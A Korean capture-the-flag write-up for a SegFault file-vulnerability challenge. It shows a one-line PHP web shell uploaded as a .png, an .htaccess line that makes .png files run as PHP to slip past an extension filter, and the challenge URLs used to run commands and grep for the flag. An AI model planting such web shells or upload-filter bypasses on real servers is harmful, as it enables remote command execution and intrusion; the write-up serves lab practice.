[SegFault] (File Vuln) - Get Flag File 2

[SegFault] (File Vuln)

Get Flag File 2

FLAG 파일을 구해라!

문제 파악

본 문제에는 다운로드 기능이 존재한다. download.php 파일의 파라미터를 이용하여 flag를 찾아야 한다.

Vunl Point

게시판의 글쓰기 기능에서 .php 확장자를 필터링하고 있기 때문에 png 확장자로 올리고 .htaccess 파일을 업로드하여 실행가능한 확장명을 수정하여 우회를 시도한 결과 업로드가 가능한 것을 확인하였다.

---

문제 풀이 (해결 방안)

한줄 웹 쉘

기본적인 한 줄 웹쉘은 다음과 같다.

<?php
echo system($_GET['cmd']);           
?>

 

 

 

파일 업로드

web_shell.php -> web_shell.png

위와 같이 확장자를 .png로 올리고, .htaccess 파일을 업로드한다.

filename = ".htaccess"

AddType application/x-httpd-php .png

위의 코드를 이용하여 png 파일을 php로서 이용 가능하게 된다.

파일이 업로드된 위치를 파악하기 위해 다운로드 기능에서 해당 링크를 확인해보면 다음과 같다.

http://ctf.segfaulthub.com:3185/download_2/download.php?filePath=/gear/web_shell.png

 

flag 찾기

http://ctf.segfaulthub.com:3185/download_2/gear/web_shell.png

파일의 위치는 위와 같기 때문에 해당 위치에서 웹 쉘을 실행한다.

위와 같이 ../../index.php를 요청한결과 다음과 같이 index.php에 flag 값이 존재하는 것을 확인할 수 있었다.

---

생각해 볼 점

본 문제의 경우와 같이 flag값을 찾는 경우에 만약 flag값의 일부를 알고 있다면 다음과 같이 grep 명령어를 이용하여 검색이 가능하다.

grep -r segfault{ ../../

---

질문 환영, 수정 및 보완에 대한 지적 환영